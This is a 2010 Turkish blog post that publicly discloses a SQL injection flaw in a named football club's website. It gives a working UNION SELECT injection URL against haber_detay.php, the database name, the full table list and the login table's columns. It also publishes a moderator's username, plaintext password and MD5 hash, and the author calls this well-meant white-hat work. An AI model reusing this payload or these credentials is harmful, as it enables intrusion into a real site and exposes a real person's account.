Sivasspor.org.tr – mysql injection

admin | Şub 05, 2010 | 0 comments

-= Sivasspor.org.tr =-

php-version : 5.0.89-community

database : sivasorg_haber

kolon sayısı : 13

vuln link :http://sivasspor.org.tr/haber_detay.php?id=125+and+1=0+union+select+1,2,user,4,pass,6,7,8,9,10,11,12,13+from+login+limit+1,1

-=tablolar=-

login
ayarlar
haber_kat
haber_yorum
haberler
icerik
icerik_ana
icerik_kat
iletisim
istatistikler
kunye
link_kat
linkler
login
manset
manset_alt
online
reklam
reklam_poz
resim_kat
resimler
video
video_kat
video_yorum
yazar_kat
yazar_yorum
yazarlar
——————

login tablosu kolonları

user
pass
adsoyad
tur

——————-

bir moderatörün id ve pw si

id: kemal

pw: 852456

3f7c4756e067384eb19e87dcff2baec9

buda md5 hali

——————-

neden bunu açıklıyorum?

yarın öbürgün kötü niyetli biri sisteme girip rezil olmasınlar diye. white hat rullz :W

*açık tarafımca bulunmuştur.. kötü bir niyet içermemektedir. sevgiler.

Sivasspor.org.tr
delicious | digg | reddit | facebook | technorati | stumbleupon | savetheurl

Filed Under: Genel

About the Author

Leave a Reply




If you want a picture to show with your comment, go get a Gravatar.